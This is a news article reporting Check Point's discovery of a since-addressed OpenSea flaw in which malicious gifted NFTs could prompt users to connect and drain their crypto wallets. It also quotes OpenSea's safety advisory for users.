Critical security vulnerabilities on OpenSea’s platform allows hackers to hijack user accounts and steal entire crypto wallets by sending malicious NFTs.
Over the past few weeks, several cases of lost crypto wallets have been reported and tweeted on social media platforms. Users have been complaining about zero balance in their crypto wallets; a result of accepting a gift on the OpenSea marketplace.
Taking the lead from these tweets, Check Point researchers investigated the OpenSea platform to discover the vulnerability. The investigation revealed a critical security vulnerability, which, if exploited, allows hackers to hijack user accounts and steal crypto wallets by enticing them through malicious free non-fungible tokens (NFTs).
OpenSea is a peer-to-peer digital marketplace for crypto collectibles and NFTs. It is a platform to buy and sell exclusive digital assets. OpenSea recorded $3.4 billion in transaction volume in August 2021 and has grown to be one of the largest marketplaces for NFT of the crypto world.
The security vulnerability on the OpenSea platform allows the hacker to create a malicious NFT and send it as a gift to the target victim.
On viewing the malicious NFT, a pop-up is activated from the storage domain, asking for a connection to the target’s cryptocurrency wallet. Not suspecting the pop-up, the victim clicks to connect their wallet to claim the gift (NFT), allowing the hacker access to the user wallet.
An additional pop-up describing the transaction is triggered, which is also sent from OpenSea’s storage domain. Once the user clicks it without noticing the message, the hacker can steal the entire cryptocurrency wallet. The victims fall prey easily as any action — even liking an art in the system — on the platform requires a wallet sign-in. These messages evade suspicion as these are frequent system notices, which users are accustomed to while operating on these platforms.
Check Point researchers informed OpenSea of their findings, and both the groups have collaborated to address the issue. OpenSea came up with a solution, though it claims to have not identified any case where the attackers have cheated their customers.
OpenSea released an advisory to protect its users against the threat, stating the following:
- While signing wallet actions is required to take certain actions on OpenSea, you should always be careful when receiving requests to sign a transaction with your wallet online. Before you approve a request for your signature, you should carefully review what is being requested and consider whether the request is abnormal or suspicious. If you have any doubts, you should reject the request.
- Check if the signature request correlates with an expected action.
- Users should note that OpenSea does not request wallet signatures for viewing or clicking third-party photos or links. Such activity is highly suspicious, and users should not sign transactions that are unrelated to the specific actions on OpenSea.
The crypto market is largely an unorganized sector without stringent policies and regulations in place. This makes it an attractive target for cyberattacks. As these marketplaces were created to enhance the financial sector, countries are viewing them more as a bane than a boon.
China had issued a blanket ban on all crypto transactions and mining to further its crackdown and root out all illegal cryptocurrency activity from its country. Many countries are taking preventive measures to curb the security challenges arising from the DeFi markets.